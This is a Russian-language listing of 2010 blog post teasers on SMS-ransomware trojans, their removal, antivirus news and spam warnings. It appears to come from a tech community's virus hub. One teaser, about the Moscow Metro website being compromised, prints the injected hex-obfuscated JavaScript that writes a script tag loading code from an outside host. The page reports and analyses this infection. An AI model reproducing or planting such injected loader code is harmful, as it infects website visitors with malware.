войти зарегистрироваться

Вирусы (и антивирусы) whois

индекс
150,09

Kaspersky RescueDisk 10.0.10.1 (начало бета-теста)

Сегодня начался бета-тест RescueDisk (RD), который будет входить в KIS/KAV2011

ISO файл RD можно скачать тут

Читать дальше →
18 марта 2010, 23:27
Marfapr
24

Онлайн-интервью: троянские вымогатели (SMS-блокеры)

… Почему АВ индустрия оказалась неготова к эпидемии "вымогателей"
… Ведутся ли работы, которые позволят в будущем исключить подобные происшествия?
… Чем обусловлено нежелание сотовых операторов бороться с вымогателями?
… Откуда берутся коды разблокировки?

Ответы на эти и другие вопросы — в интервью с вирусным аналитиком "Лаборатории Касперского" Иваном Татариновым.

C 15 по 19 марта.
+1
16 марта 2010, 22:54
virusinfo.info/showthread.php?...
semen
6

Яндекс запустил свой собственный веб-антивирус

Яндекс запустил свой собственный антивирусный комплекс, который построен на поведенческом подходе. Теперь на страже безопасности пользователей стоит не только антивирус Sophos'a, который работает в основном на сигнатурах, но и поведенческий антивирус Яндекса. См. также http://webmaster.ya.ru/replies.xml?item_no=7420.
+25
1 марта 2010, 10:12
company.yandex.ru/news/press_r...
sterlingov
11

Удаляем трояна, требующего отправку SMS с компьютера

Сегодня с утра на работе сотрудница словила троян, требующий отправки SMS на короткий номер.

Тут должна быть картинка с трояном, но что самое смешное, я не смог запустить его на виртуалке. Даже в автозагрузку его прописывал, ну не хочет работать и всё. В общем, если желающие сделают скриншот, то будет очень неплохо. Сам троян для опытов можно скачать отсюда. При этом я видел окно только мельком, но выглядело оно красиво :)Мне прислали картинку:.
Отправьте SMS

По поводу механизма заражения очень хорошо расписал Olegas, я, соответственно распишу про первую часть, про лечение. Кстати, первоначально было подозрение в том, что это дыра в IE8, на практике оказалось что скорее всего вирус проник через дыру в Java или Flash. Так что, в принципе, не защищён ни один из браузеров. Анализ логов показал, что сайты посещались достаточно безобидные, на каком из них завёлся iframe с дроппером, выяснить не удалось (не все же перебирать, в самом деле).

Читать дальше →
+44
11 февраля 2010, 22:09
force
150

Есть ли жизнь на Марсе?

Сколько в природе вирусов под WM? Может ли заразиться Siemens A35? Нужен ли антивирус на КПК? Что делают программы-шпионы на телефонах? Что такое Анти-вор?
Ответы на эти и другие вопросы — в интервью с руководителем направления разработки антивирусного ПО для мобильных устройств Лаборатории Касперского. Да, и ещё призы :)
0
11 февраля 2010, 19:59
virusinfo.info/showthread.php?...
semen
комментировать

Интересная техника сокрытия кодов JS «вируса»

Сегодня скинули код, дропающий на машину штатный вирус «отправьте SMS для разблокировки». Предысторию и методику чистки изложил force

Попробовал расковырять. Взял код, отформатировал, стал дебагать… Хм, интересно… В коде идет вызов (после приведения к читабельному виду)

window['eval'](var2);

А вот в var2 — бинарные данные. Ух ты… Но ведь eval не может выполнять бинарные данные!!!

И почему же в eval оказались бинарные данные?
+81
11 февраля 2010, 16:25
Olegas
43

И вновь история повторяется… Спам с вирусами, акт второй

Доброго времени суток, Хаброчитатель!

Не так давно я писал пост об рассылке спама (и не я один предупреждения писал). Казалось, вроде бы, история закончилась… Однако, нет! И вновь ко мне пришло письмо подобного характера.
Читать дальше →
+42
2 февраля 2010, 21:40
Zzet
41

Восстановление работы ОС после вируса-вымогателя

Мой лучший друг принёс мне посмотреть нетбук, на котором сурово погуляли вирусы, и попросил помочь почистить систему от зоопарка. Впервые увидел воочию забавную ветку в развитии вредоносного ПО: «вымогатели». Такие программы блокируют часть функций операционной системы и требуют отправить SMS сообщение для получения кода разблокировки. Лечение вышло не совсем тривиальным, и я подумал, что возможно эта история сбережёт кому-нибудь немного нервных клеток. Я постарался приводить ссылки на все сайты и утилиты, которые понадобились в ходе лечения.
Читать дальше →
+11
25 января 2010, 00:56
ViSP
33

Внимание! Спамеры поумнели и добрались до фриланса

Как-то на днях мне пришло одно письмо, с предложением работы. Вроде ничего плохого — полу сформулированное предложение работы, тема нормальная, вроде подписались, в общем, ничего подозрительного — но это спам… и, как оказалось, не один я спешу предупредить. На weblancer.net и free-lance.ru уже отреагировали.
Читать дальше →
+79
22 января 2010, 20:17
Zzet
71

Официальный сайт Московского метрополитена затроянили

Открываем исходный код любой страницы mosmetro.ru, в начале видим вставку Javascript кода:
<script language="javascript" src="/script.js"></script>

Смотрим последнюю строку злополучного файла:
var _0xd5c2=["\x3C\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x74\x68\x65\x74\x72\x61\x66\x2E\x6E\x65\x74\x2F\x74\x64\x73\x2F\x69\x6E\x2E\x63\x67\x69\x3F\x64\x65\x66\x61\x75\x6C\x74\x22\x3E\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E","\x77\x72\x69\x74\x65"];document[_0xd5c2[1]](_0xd5c2[0]);

После выполнения данного участка на странице происходит добавление ещё одного сценария, но уже по внешней ссылке:
<script src="http://thetraf.net/tds/in.cgi?default"></script>
Читать дальше →
+49
15 января 2010, 23:46
Lux_In_Tenebris
74